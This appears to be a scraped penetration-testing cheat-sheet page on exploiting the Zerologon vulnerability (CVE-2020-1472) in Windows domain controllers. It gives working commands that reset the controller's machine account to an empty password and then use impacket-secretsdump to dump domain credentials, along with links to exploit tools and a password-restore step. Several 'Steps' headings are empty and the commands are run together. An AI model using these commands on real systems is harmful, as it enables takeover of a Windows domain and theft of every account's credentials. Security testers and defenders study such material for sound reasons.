Zerologon
CVE-2020-1472 Zerologon
Tools: Impacket-secretsdump, https://github.com/risksense/zerologon, https://github.com/SecuraBV/CVE-2020-1472
python3 set_empty_pw.py NETBIOS_NAME DC_IP impacket-secretsdump -just-dc -no-pass DOMAIN.LOCAL/NETBIOS_NAME\$DC_IPimpacket-secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'python3 reinstall_original_pw.py NETBIOS_NAME DC_IP ORIGINAL_NTLM_ADMIN_HASH (Reinstalls the original password that the admin had to prevent permanent damage on the machine)TIP: The LM and NTLM hashes represented in the command are actually the hashed version of empty password/string
Alternate Method: nccfsas - .NET binary for Cobalt Strike's execute-assembly
Tools: https://github.com/nccgroup/nccfsas
Steps:
Alternate Method: CrackMapExec (Only check)
Alternate Method: Mimikatz - 2.2.0 20200917 Post-Zerologon
Steps:
A 2nd approach to exploit zerologon is done by relaying authentication.
Prerequisites:
Steps:
PreviousProxyNotShell / ProxyShell / ProxyLogon (CVE-2022-41040 & CVE-2022-41082 / CVE-2021-34473 & CVE-2021NextnoPAC
Last updated